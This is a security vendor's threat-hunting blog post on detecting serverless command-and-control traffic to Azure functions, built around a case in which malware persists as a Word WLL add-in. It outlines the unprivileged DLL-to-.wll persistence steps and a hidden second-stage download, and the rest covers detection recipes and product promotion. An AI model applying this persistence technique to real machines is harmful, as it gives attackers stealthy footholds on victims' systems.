Blog Post

Threat Hunting Series: Detecting Command & Control in the Cloud

There are certain types of sophisticated threat behaviors that are generally considered “impossible” to detect on the network. This blog post launches a series examining some of these cases. Let’s take a look at the first one.

Serverless C2 in the cloud, from malware persistent with low-privilege (Case Study)

A threat hunting engagement with a financial services client had a situation where the C2 was TLS encrypted, as most traffic is these days- but the C2 server was actually “serverless” code running in the Azure cloud. In this scenario, what is seen on the network is an encrypted tunnel to a subdomain of azurewebsites.net. In many networks, there can be thousands of unique sessions per day, to hundreds of subdomains of azurewebsites.net. To make matters worse, traditional approaches to TLS fingerprinting (such as JA(3)) are quite ineffective at making sense of this traffic because there is usually a homogenous mix of background updaters, web browsers, IoT clients, and more that interact with the Azure cloud.

The malware in question persists as an Office add-in, which complicates detection on both the network and endpoint itself. This malware only runs when certain Office applications are started (which could be quite frequent based on the victim). And because it runs inside the Office process, it makes it more difficult to detect on the endpoint. Even worse, it’s possible to load malicious add-ins without elevated permissions, user-intervention or notification, and malicious add-ins can download and run other executables without user knowledge with normal user-level permissions.

This post reconstructs the scenario to show how simple and nefarious these threats are, and how Awake effectively detects extremely sophisticated threats. A separate post examines some of the exciting detection creation capabilities we offer security analysts in the latest Awake Security Platform release.

William Knowles with MWR Labs wrote a fantastic piece on Office persistence where he highlights various persistence techniques, including one known as WLL add-ins for Word. In short, you:

  1. Take a malicious DLL
  2. Put it in a directory that unprivileged users have access to (%appdata%\Roaming\Microsoft\Word\startup\)
  3. Change the extension from .dll to .wll

And that’s it. Word will run the code in the .dll every time the application is opened. Similar capabilities exist for Excel, PowerPoint, etc.


Figure 1: Drop the malicious .dll in this unrestricted directory, change the extension from .dll to .wll, and voila! Instant persistence. Word will execute whatever is in DllMain().

But, what if you’ve disabled add-ins?

It doesn’t matter even if you have configured Word to disable add-ins since that setting does indeed disable add-ins, except WLLs.

Figure 2: For WLL add-ins, this setting is for decoration only. Malicious .wll add-ins will still load.

So, what can you do with such an add-in? For starters, you can download and run other executables.

If the malicious .dll is totally self-contained (meaning it doesn’t need to download and run other files), then examining the process will show nothing because all the code is running in Word.

Figure 3: The process when the add-in does not execute other applications. The code runs within WINWORD.exe.

One disadvantage to a completely self-contained .dll is that static detection is easier since the single .dll will likely contain a high percentage of suspicious functionality.

The attackers, in this case, created an add-in that is just a simple loader and clean-up for other executables. DLL’s with simple functionality are usually more difficult to statically detect as malicious because they don’t have many overtly suspicious-looking features. Adding a few red-herring imports that are frequently used by legitimate programs (and not malware) makes detection even less likely. Figure 4 shows the example reconstructed for this blog, which uses a simple add-in to download, execute and then clean up other malicious executables.

Figure 4: Under the WINWORD.EXE process is a child process with the same name (WINWORD.exe), however, the child WINWORD is not signed by Microsoft.

The executable downloaded and executed from the Internet is shown as a child process of WINWORD.exe. This file was also named WINWORD.exe, but seeing conhost.exe tells us the second WINWORD is not a GUI application. It is a console application and is hidden from the user because it ultimately launched in a hidden state by ShellExecute. Also, the child WINWORD process is not signed by Microsoft. This is the malicious second-stage binary.

Unfortunately, detectability gets worse when downloading executables from the Internet.

Serverless C2

If you’re not already terrified of the potential impact of serverless C2 on SOC operations, you may want to skip this section so you can continue sleeping well at night.

In the “good old days”, if you wanted to set up a server, you needed to find someplace to put it. Colocation eventually gave way to virtual servers, which are easier to manage in certain ways. But you still need to manage an entire server instance simply to run some simple task (like C2). At the end of the day, most C2/botnet controllers were relatively simple PHP applications, but the attacker still needed to manage a full server only when a relatively simple task needed to be accomplished.

Serverless computing has eliminated all that headache. Now, you can take your web app code (such as that PHP-based C2), upload the code to a serverless function provider, and it just works without needing to worry about the underlying system running the app. Since functions in code usually take some input and give some output after running, the same happens with serverless functions. The difference is you pass parameters and data into a serverless “function” with a GET or POST request and receive the results in a web response.

This is terrifying from a threat detection and hunting perspective because the vast majority of a company’s Internet traffic is already going to Microsoft, Google, Amazon, and Cloudflare – and all of it is pretty much encrypted, too. When running this way, the C2 traffic has the same hosting, certificate, and server characteristics as the vast majority of traffic to/from most enterprises. As our customer pointed out to us, they have yet to find a Network Traffic Analysis (NTA) solution that can handle a situation like this.

Making the Impossible Possible

Network tools have been defeated by many modern threat scenarios because they haven’t evolved beyond outdated thinking that locks them within the confines of sessions and protocols. The reality is threat detection is based on understanding applications and how they utilize sessions and protocols over time.

In the context of this post, what happens when Microsoft Word is started up? The answer is different depending on the version of Office, how it is licensed, and the Windows version you’re running on. But there is a set of events in most recent versions analogous to the sequence shown below. For the systems used in this post, you will see a handful of requests made (in order) to the following locations as the application starts up:

  1. Several [a-z]-ring.msedge.net connections
  2. Possible ocws.officeapps.live.com connections
  3. Finally fp.msedge.net

Figure 5: Word starting up with no add-ins present

However, you’ll see the following if an add-in is loaded that communicates on the network:

  1. Several <a single letter>-ring.msedge.net connections
  2. <request(s) from add-in(s)>
  3. Possible ocws.officeapps.live.com connections
  4. Finally fp.msedge.net

Figure 6: Word starting up, with the malicious add-in present. It downloads and executes the second stage payload from an azurewebsites.net function.

If we don’t think in terms of being limited to detecting single sessions to identify network-connected add-ins like this, we simply need to:

  1. Identify the “network fingerprint” of Word starting up
  2. Then identify the additional add-in connections
  3. Alert to “add-in connections that are not common”

The following screenshot shows a detection in Awake doing exactly that.

Figure 7: A detection in Awake that identifies that application fingerprint of Word starting up, identifies plug-ins making requests during the start-up, then returns those that are uncommon for the enterprise.

As the caption says in the screenshot above, you see a “recipe” that is extracting connections embedded in the start-up application fingerprint for Word, then returning results for the outliers, which then trigger threat behavior detections in the Awake Security Platform.

The underlying detection logic is more complicated. But for the discerning and skeptical reader, a section is included below. And, you should be skeptical if you understand how substantial of a breakthrough this capability is for network threat detection!

Figure 8: Everyday users typically don’t interact with raw underpinnings like this, but for the curious reader, the detection works by taking the fingerprint described earlier, extracting additional embedded connections, then alerting to the ones that are rare. More fingerprints and versions are being added all the time, including by our customers.

If you also understand the difficulty in addressing cases like this with the other network traffic tools, then this observation should be most exciting to you: With the ability to write true TTP-level rules like this, we not only catch the challenging cases like serverless C2, but we also catch all rouge/uncommon add-ins with this single detection.

In the previous example, the serverless C2 is caught because of the surrounding contextual sessions seen when Word starts up. But what happens when we have serverless C2 malware that doesn’t run as an add-in and running instead as a scheduled task once-a-day so there aren’t meaningful surrounding sessions to analyze?

That challenge is even easier to address in Awake. In those cases, we simply look for the least common recurrent serverless endpoints, as shown here:

Figure 9: General-purpose persistence detection!

Figure 9 shows a detection recipe that can alert if traffic is seen:

  1. To a destination that is rare for the enterprise, and
  2. That activity is seen [in the case pictured above] at least five of the past 14 days.

We could easily change those numbers to be three of the past seven days, or even change the recipe itself to represent almost any attacker TTP – like “alert when a device connects directly to an IP address (no DNS request) for 3 of the past 7 days.”

It seems I’ve digressed at this point. But that’s easy to do when you’ve spent a career doing threat detection and finally get the opportunity to use a capability that allows you to define and detect almost any threat behavior imaginable.

Have some challenging threat cases to address on the network? Drop us a line and let’s see if we can solve them!

Authors: Gary Golomb and Troy Kent

Gary Golomb
Gary Golomb

Co-Founder & Chief Scientist